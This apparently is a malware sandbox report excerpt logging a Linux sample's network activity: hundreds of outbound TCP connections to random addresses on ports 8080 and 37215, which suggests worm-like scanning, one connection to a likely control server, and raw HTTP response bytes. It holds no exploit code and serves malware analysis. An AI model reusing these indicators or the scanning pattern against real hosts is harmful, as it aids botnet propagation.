Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.91.17.118:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.176.23.84:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.226.79.175:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.211.217.92:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.225.82.115:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.143.54.27:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.249.121.151:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.144.92.37:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.63.8.177:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.131.225.17:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.222.233.245:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.216.60.27:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.171.122.214:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.58.214.42:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.31.222.55:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.245.195.241:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.174.61.251:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.146.231.239:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.49.193.97:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.12.109.105:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.34.130.58:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.130.33.180:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.8.183.145:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.137.101.147:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.26.163.114:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.58.119.220:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.251.160.197:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.211.38.116:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.28.59.164:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.132.48.222:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.140.37.217:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.162.10.105:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.57.178.47:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.144.244.95:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.148.56.104:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.56.97.9:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.187.235.68:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.34.43.237:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.79.110.52:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.115.121.94:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.203.35.33:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.94.163.246:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.49.180.244:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.127.187.216:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.157.227.77:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.40.123.37:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.37.62.42:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.87.231.83:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.121.226.172:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.85.230.18:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.46.241.106:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.79.39.173:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.28.51.246:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.97.142.64:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.242.187.245:8080
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.176.127.88:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.65.208.240:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.99.12.223:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.154.8.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.12.121.191:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.91.66.12:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.22.157.220:8080
Source: global traffic	TCP traffic: 192.168.2.23:46828 -> 209.141.40.100:3884
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.201.104.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.248.84.70:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.133.59.203:37215
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.237.209.225:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.83.62.158:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.38.140.205:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.190.9.66:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.167.68.29:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.182.82.5:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.14.59.254:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.68.8.107:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.86.121.14:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.63.168.18:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.195.161.117:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.193.194.209:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.39.178.194:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.35.126.92:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.208.182.223:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.81.35.147:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.2.162.221:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.69.133.101:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.96.135.0:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.157.69.29:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.242.249.54:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.35.22.7:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.139.210.196:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.16.36.24:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.131.45.171:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.9.189.202:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.175.66.96:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.103.124.66:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.203.215.126:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.162.19.59:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.153.192.158:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.193.175.196:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.97.100.37:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.228.162.210:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.3.129.244:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.99.74.212:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.101.180.209:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.121.254.186:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.16.86.181:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.13.80.146:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.120.82.254:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.89.54.59:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.126.190.223:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.129.203.4:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.114.61.11:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.47.45.56:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.243.222.66:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.158.39.29:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.25.224.205:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.175.214.81:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.173.107.105:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.68.147.215:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.232.234.180:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.7.58.24:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.99.184.171:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.244.242.33:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.42.198.0:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.51.117.30:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.40.249.181:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.154.38.194:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.215.89.145:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.171.91.154:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.93.77.141:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.12.109.4:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.141.227.151:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.127.244.35:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.84.31.154:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.95.4.152:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.35.132.12:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.136.185.147:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.69.35.130:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.28.16.225:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.9.142.243:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.46.158.198:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.113.171.149:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.182.210.30:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.199.227.164:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.83.247.239:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.233.5.224:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.132.57.84:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.221.79.143:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.96.109.222:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.129.76.93:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.193.169.173:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.144.251.47:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.246.253.87:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.233.254.20:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.59.120.127:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.100.160.59:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.186.19.38:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.119.218.60:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.67.119.34:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.242.8.207:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.161.254.191:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.29.155.108:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.201.210.89:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.175.250.95:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.252.170.163:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.49.9.140:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.1.175.255:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.120.205.166:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.40.185.66:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.11.61.234:8080
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.10.162.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.48.87.13:37215
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.95.245.104:8080
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.247.115.121:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.110.215.239:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.43.158.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.132.146.141:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.249.97.214:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.173.71.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.195.67.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.1.172.240:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.112.42.210:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.45.158.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.33.93.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.23.77.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:29325 -> 41.83.10.213:37215
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.100.24.80:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.110.165.153:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.246.225.174:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.63.228.243:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.232.89.110:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.117.55.106:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.197.11.228:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.222.37.222:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.15.94.231:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.16.154.133:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.146.92.61:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.218.22.254:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.104.48.89:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.38.126.66:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.45.68.236:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.171.56.93:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.236.188.109:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.179.14.176:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.188.142.127:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.39.219.179:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.106.227.144:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.129.113.30:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.109.255.44:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.195.185.51:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.144.130.85:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.54.176.200:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.219.177.135:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.253.222.144:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.179.160.194:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.123.145.194:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.200.20.106:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.126.176.235:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.153.65.252:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.16.142.155:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.11.170.201:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.139.202.211:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.103.98.202:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.26.54.56:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.183.2.157:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.167.235.47:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.88.145.33:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.103.43.210:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.103.29.235:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.52.61.73:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.231.144.33:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 94.15.17.103:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.81.81.20:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.14.89.38:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.42.105.122:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.220.134.64:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.216.110.158:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.36.195.249:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.5.181.73:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.93.27.120:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.176.67.132:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.20.156.231:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.71.145.58:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.246.128.223:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.242.25.130:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.189.221.92:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.203.33.104:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.156.82.45:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.54.164.156:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 62.19.161.250:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.85.84.144:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.147.209.46:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.34.20.30:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.54.84.71:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 85.16.129.243:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 31.117.146.242:8080
Source: global traffic	TCP traffic: 192.168.2.23:29326 -> 95.202.148.128:8080

Source: /tmp/Dy4UCGJRnG (PID: 5239)

Socket: 127.0.0.1::23455

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:19:31 GMTServer: ApacheX-Powered-By: PHP/7.1.0Vary: Accept-EncodingContent-Encoding: gzipConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 6c 54 5d 4f db 30 14 7d ef af b8 f8 25 ad 46 e2 16 d8 04 d4 09 e2 4b 1a 12 2b 08 8a a6 09 a1 ca 24 6e 62 48 e2 60 df b6 ab c6 fe 6d 7f c8 ec 24 1d 65 2c 2f c9 bd 3e be e7 9c eb eb 74 d8 d6 d9 d5 e9 f8 c7 f5 39 64 58 e4 70 7d 77 72 79 71 0a c4 a7 f4 fb ee 29 a5 67 e3 33 f8 3a fe 76 09 7b 41 7f 00 63 cd 4b 23 51 aa 92 e7 94 9e 8f 08 90 0c b1 3a a4 74 b1 58 04 8b dd 40 e9 94 8e 6f a8 2b b5 47 73 a5 8c 08 12 4c 48 d4 61 2e 15 b1 4c f0 c4 06 85 40 0e 6e a7 2f 5e 66 72 1e 92 58 95 28 4a f4 71 59 09 02 6d 14 12 14 3f b1 2e 36 84 38 e3 da 08 0c 2f 6e af fc fd fd cf 07 fe c0 56 85 f6 61 28 31 17 d1 0d 2f 13 55 48 18 09 5c 28 fd 6c 18 6d f2 ff 21 d4 62 aa 85 c9 36 b8 76 fa c3 bb 9b cb d0 6b 0d e9 a6 56 30 95 d4 23 eb 0a 25 2f 44 48 12 61 62 2d 2b d7 86 8d fd 04 e8 86 a0 5c 96 cf e0 dc b4 26 62 63 08 68 91 87 c4 e0 32 b7 cc 42 20 81 cc ca 08 d7 2d 54 85 48 73 e1 08 af ea af 09 4a 91 28 83 0a 29 9f 24 1c 39 ad b7 06 ae 54 d4 e9 d4 5c ec 51 25 4b 4b cb 12 39 07 9e cb b4 b4 bd b4 72 84 76 90 56 cb c7 35 90 49 48 64 89 5a b5 4d 64 55 34 5e 15 ab 12 ac 67 2e 4b 59 82 f5 6e 90 73 f8 d8 d3 ea cd 66 bd 35 db a9 cb 59 b4 46 6e 8f 09 49 c4 f8 7b 6b 1b cd 3c 72 f9 86 85 44 b7 52 6a bd 5c 73 58 56 5c 19 5c 6d 31 ca 23 46 b3 9d 88 3d ea 88 35 9a 23 80 4e 87 d1 36 78 a7 60 2d 84 5a a3 91 03 35 ef 0e 6b 8e 69 f3 18 9e f8 9c 37 d9 a6 3f 73 ae 61 92 f2 17 08 9b d7 eb 2b dc 3f 0c ed 82 8b 82 6a 66 b2 ee bd 37 b1 73 77 1c c7 6a 56 a2 b7 0d de dd b1 bf 7f b0 fb 65 d0 ef fb 83 3d ef a1 f7 01 8e 9a c7 cf d7 3c 15 73 29 16 35 c0 22 ba d3 59 19 bb 91 e9 f6 e0 57 2d df 71 a7 dc 32 27 2a 9e 15 d6 57 10 6b c1 51 9c e7 c2 45 5d af 11 ea f5 86 16 16 38 13 16 eb fd 63 c3 ab 17 b9 59 96 b1 5d 45 3d 13 c3 ba b8 4d 1a ed 52 dd 7a a0 cd a1 07 e1 06 53 ae 62 ee c4 04 95 56 a8 62 95 c3 11 b4 40 4a 8d c9 3d 38 04 ef ed 6a 7b 3d f8 04 5e 90 2a 65 e7 d2 e7 f6 f6 2f 51 c6 26 88 55 41 2d d3 93 f1 86 7f 2d 99 4d 47 a9 c0 d6 8e 39 59 8e 79 3a b2 17 e8 cd d8 7d ff 61 08 26 a8 b8 b6 80 91 4a 44 20 4b 23 34 9e 88 a9 d2 a2 9b f2 6d 30 75 7b 7f f7 ba ae 8b 8c 36 3b eb 43 ae 27 9f d5 7f 87 e8 0f 00 00 00 ff ff Data Ascii: lT]O0}%FK+$nbH`m$e,/>t9dXp}wryq)g3:v{AcK#Q:tX@o+GsLHa.L@n/^frX(JqYm?.68/nVa(1/UH\(lm!b6vkV0#%/DHab-+\&bch2B -THsJ()$9T\Q%KK9rvV5IHdZMdU4^g.KYnsf5YFnI{k<rDRj\sXV\\m1#F=5#N6x`-Z5ki7?sa+?jf7swjVe=<s)5"YW-q2'WkQE]8cY]E=MRzSbVb@J=8j{=^e/Q&UA--MG9Yy:}
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 23:19:06 GMTServer: Apache/2.4.7 (Ubuntu)X-Powered-By: PHP/5.5.9-1ubuntu4.20Set-Cookie: PHPSESSID=tc4stguvkha245qhht3u8v7v67; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 587Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 54 cb 6e d3 40 14 dd e7 2b 2e b3 b7 a7 d0 2e 50 19 1b 41 12 09 a4 96 56 60 84 58 55 8e 3d 89 ad da 1e 33 33 8e 9b 1d ed 0a a9 48 48 6c 58 22 fe a0 04 8a 02 a5 e1 17 c6 7f c4 8c 1d 37 e1 51 55 aa 04 1b 8f ef 63 ce 39 f7 61 77 c8 8d de 4e d7 7b be db 87 07 de f6 16 ec 3e bd bf f5 b0 0b c8 c2 f8 d9 7a 17 e3 9e d7 6b 02 1b f6 da 4d f0 b8 9f 89 58 c6 2c f3 13 8c fb 8f 50 07 00 50 24 65 be 89 71 59 96 76 b9 6e 33 3e c2 de 63 1c c9 34 d9 c0 09 63 82 da a1 0c 91 db 21 c6 e5 76 f4 49 fd d0 d5 37 89 8c 65 42 5d f5 41 cd aa c3 ea 48 9d aa ef ea 04 d4 37 35 57 e7 d5 51 f5 52 9f 67 d5 1b 50 27 6a aa a3 73 13 ad cf 29 a8 1f 6a ae 1f 75 ca 67 1d ff a2 4e 41 4d 8d 51 1d c3 2d 7b 8d e0 06 da 90 6c f7 bd 7b 60 24 5a f4 45 11 8f 9d 2e cb 24 cd a4 e5 4d 72 0a 41 63 38 48 d2 03 59 6b be 03 41 e4 73 41 a5 53 c8 a1 75 1b 2d 31 32 3f a5 0e da a7 93 92 f1 50 a0 e5 dd 7f 50 c0 1f b4 21 15 01 8f 73 d3 fa ff c1 9c c4 d9 3e 70 9a 38 28 0e 0c 63 c4 e9 d0 41 78 e8 8f 8d 6d eb 07 02 a9 1b a8 e3 a9 3f a2 f8 c0 aa f3 7e bb 2b 22 c6 65 50 48 b8 3e 08 38 80 84 9c 24 54 44 94 ca 36 bf 9e 56 20 c4 05 a6 7e c7 75 9a 6d bc d7 45 48 d8 28 ce ac 55 1c 82 9b 65 25 03 16 4e 0c ac 06 1e 32 9e 42 1c 3a a8 4e df 33 26 82 94 ca 88 69 df ee ce 13 0f 35 89 75 72 0e 41 e2 0b e1 20 ca 39 e3 c8 25 38 ff 5b 34 ce f2 42 ee e5 c8 55 6f f5 a4 5e 81 3a d3 13 f9 a4 66 ea 7c 13 48 1d 6c 33 cd ec 39 4b 56 eb 40 8b 1d a9 f5 20 18 fb 49 a1 2d 84 af 26 7b af c9 9a 5d 79 7d 05 4f ae 9d 66 ef 5b ae 5c 94 4b 26 b8 94 8a 53 21 19 a7 ba 6e bf 6d f4 c2 85 35 fd 3b bd 7f 1f ab 63 5d ec cc ec e5 85 96 bb 04 fb 97 21 8a 62 90 c6 b5 fa 5f f5 2e fc 03 99 b5 92 1b 4f 2b b8 b5 16 9a 75 9f e7 ea ab fe 26 66 ab 7d 22 d8 4c d3 8c bd 99 37 c1 cd 3f eb 27 53 ff 17 a9 26 05 00 00 Data Ascii: Tn@+..PAV`XU=33HHlX"7QUc9awN{>zkMX,PP$eqYvn3>c4c!vI7eB]AH75WQRgP'js)jugNAMQ-{l{`$ZE.$MrAc8HYkAsASu-12?PP!s>p8(cAxm?~+"ePH>8$TD6V ~umEH(Ue%N2B:N3&i5urA 9%8[4BUo^:f\|Hl39KV@ I-&{]y}Of[\K&S!nm5;c]!b_.O+u&f}"L7?'S&

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 41.166.69.130
Source: unknown	TCP traffic detected without corresponding DNS query: 41.98.70.131
Source: unknown	TCP traffic detected without corresponding DNS query: 41.22.125.58
Source: unknown	TCP traffic detected without corresponding DNS query: 41.82.161.226
Source: unknown	TCP traffic detected without corresponding DNS query: 41.221.202.130
Source: unknown	TCP traffic detected without corresponding DNS query: 41.16.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 41.83.37.28
Source: unknown	TCP traffic detected without corresponding DNS query: 41.213.55.62
Source: unknown	TCP traffic detected without corresponding DNS query: 41.35.102.26
Source: unknown	TCP traffic detected without corresponding DNS query: 41.68.186.38
